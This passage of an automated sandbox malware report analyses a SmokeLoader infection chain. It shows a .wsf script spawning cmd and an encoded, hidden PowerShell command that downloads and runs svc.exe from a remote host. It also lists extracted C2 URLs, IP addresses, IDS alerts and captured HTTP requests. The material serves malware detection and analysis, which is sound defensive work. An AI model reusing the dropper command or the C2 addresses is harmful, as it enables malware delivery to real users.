JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1664, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 6016, ProcessName: powershell.exe
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\tesubba, CommandLine: C:\Users\user\AppData\Roaming\tesubba, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\tesubba, NewProcessName: C:\Users\user\AppData\Roaming\tesubba, OriginalFileName: C:\Users\user\AppData\Roaming\tesubba, ParentCommandLine: , ParentImage: , ParentProcessId: 932, ProcessCommandLine: C:\Users\user\AppData\Roaming\tesubba, ProcessId: 7404, ProcessName: tesubba
      Source: Process startedAuthor: frack113: Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1664, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 6016, ProcessName: powershell.exe
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\w4DO1Z18yg.wsf", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6536, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 1664, ProcessName: cmd.exe
      Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\oBuf.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\oBuf.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\oBuf.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\oBuf.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\oBuf.exe, ParentCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6016, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\oBuf.exe" , ProcessId: 4836, ProcessName: oBuf.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\w4DO1Z18yg.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\w4DO1Z18yg.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\w4DO1Z18yg.wsf", ProcessId: 6536, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, CommandLine|base64offset|contains: D, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1664, ParentProcessName: cmd.exe, ProcessCommandLine: powErshEll -nop -w hiddEn -Ep bypass -Enc JABwAGEAdABoACAAPQAgACQARQBuAHYAOgB0AGUAbQBwACsAJwBcAG8AQgB1AGYALgBlAHgAZQAnADsAIAAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAYwBsAGkAZQBuAHQALgBkAG8AdwBuAGwAbwBhAGQAZgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBiAGUAcwB0AG0AYQBnAGEAegBpAG4AZQBmAG8AcgBhAG4AaQBtAGEAbABzAHUAbgBpAGMAdQBtAC4AcgB1AC8AZABvAHcAbgBsAG8AYQBkAC8AcwB2AGMALgBlAHgAZQAnACwAJABwAGEAdABoACkAOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABhAHQAaAA=, ProcessId: 6016, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-04T16:37:06.339157+020020391031A Network Trojan was detected192.168.2.749845193.46.217.7880TCP
      2024-10-04T16:37:07.718485+020020391031A Network Trojan was detected192.168.2.749856188.40.141.21180TCP
      2024-10-04T16:37:08.097751+020020391031A Network Trojan was detected192.168.2.749856188.40.141.21180TCP
      2024-10-04T16:37:32.793927+020020391031A Network Trojan was detected192.168.2.749974193.46.217.7880TCP
      2024-10-04T16:37:33.144894+020020391031A Network Trojan was detected192.168.2.749856188.40.141.21180TCP
      2024-10-04T16:37:33.535419+020020391031A Network Trojan was detected192.168.2.749856188.40.141.21180TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-04T16:36:36.183779+020020197142Potentially Bad Traffic192.168.2.749699193.46.217.7880TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\AppData\Roaming\tesubbaAvira: detection malicious, Label: HEUR/AGEN.1312567
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
      Source: 0000000F.00000002.1688228770.0000000002060000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://unicexpertmagazine.pw/index.php", "http://ceoconstractionstore.pl/index.php", "http://openclehardware.ru/index.php", "http://informcoopirationunicolceo.ru/index.php"]}
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeReversingLabs: Detection: 87%
      Source: C:\Users\user\AppData\Roaming\tesubbaReversingLabs: Detection: 87%
      Source: w4DO1Z18yg.wsfReversingLabs: Detection: 26%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: C:\Users\user\AppData\Roaming\tesubbaJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\oBuf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Software Vulnerabilities

      barindex
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49856 -> 188.40.141.211:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49845 -> 193.46.217.78:80
      Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.7:49974 -> 193.46.217.78:80
      Source: C:\Windows\explorer.exeNetwork Connect: 188.40.141.211 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 193.46.217.78 80Jump to behavior
      Source: Malware configuration extractorURLs: http://unicexpertmagazine.pw/index.php
      Source: Malware configuration extractorURLs: http://ceoconstractionstore.pl/index.php
      Source: Malware configuration extractorURLs: http://openclehardware.ru/index.php
      Source: Malware configuration extractorURLs: http://informcoopirationunicolceo.ru/index.php
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Fri, 04 Oct 2024 14:36:36 GMTContent-Type: application/x-msdos-programContent-Length: 222720Connection: closeLast-Modified: Wed, 02 Oct 2024 05:06:08 GMTETag: "36600-62377654eb000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 d2 fc 49 42 b3 92 1a 42 b3 92 1a 42 b3 92 1a 5c e1 16 1a 5e b3 92 1a 5c e1 07 1a 51 b3 92 1a 5c e1 11 1a 1e b3 92 1a 65 75 e9 1a 45 b3 92 1a 42 b3 93 1a 32 b3 92 1a 5c e1 18 1a 43 b3 92 1a 5c e1 06 1a 43 b3 92 1a 5c e1 03 1a 43 b3 92 1a 52 69 63 68 42 b3 92 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 1e 60 49 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 80 01 00 00 64 11 00 00 00 00 00 16 17 00 00 00 10 00 00 00 90 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 13 00 00 04 00 00 03 a2 03 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 a7 01 00 50 00 00 00 00 50 11 00 e0 a1 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 a4 01 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 df 7e 01 00 00 10 00 00 00 80 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 20 00 00 00 90 01 00 00 22 00 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 7f 0f 00 00 c0 01 00 00 18 00 00 00 a6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 1d 05 00 00 00 40 11 00 00 06 00 00 00 be 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 a1 01 00 00 50 11 00 00 a2 01 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: bestmagazineforanimalsunicum.ruConnection: Keep-Alive
      Source: Joe Sandbox ViewIP Address: 188.40.141.211 188.40.141.211
      Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
      Source: Joe Sandbox ViewASN Name: CUBENODEES CUBENODEES
      Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.7:49699 -> 193.46.217.78:80
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xedfkhosquhy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: unicexpertmagazine.pw
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://utsxpdquoutvtc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: ceoconstractionstore.pl
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rfcqeahtpbrxjuy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: ceoconstractionstore.pl
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obbtjayrfmnjdrv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: unicexpertmagazine.pw
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fwtilsrhssulldop.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: ceoconstractionstore.pl
      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ooxywteyveq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: ceoconstractionstore.pl
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /download/svc.exe HTTP/1.1Host: bestmagazineforanimalsunicum.ruConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: bestmagazineforanimalsunicum.ru
      Source: global trafficDNS traffic detected: DNS query: unicexpertmagazine.pw
      Source: global trafficDNS traffic detected: DNS query: ceoconstractionstore.pl
      Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xedfkhosquhy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: unicexpertmagazine.pw
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 04 Oct 2024 14:37:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 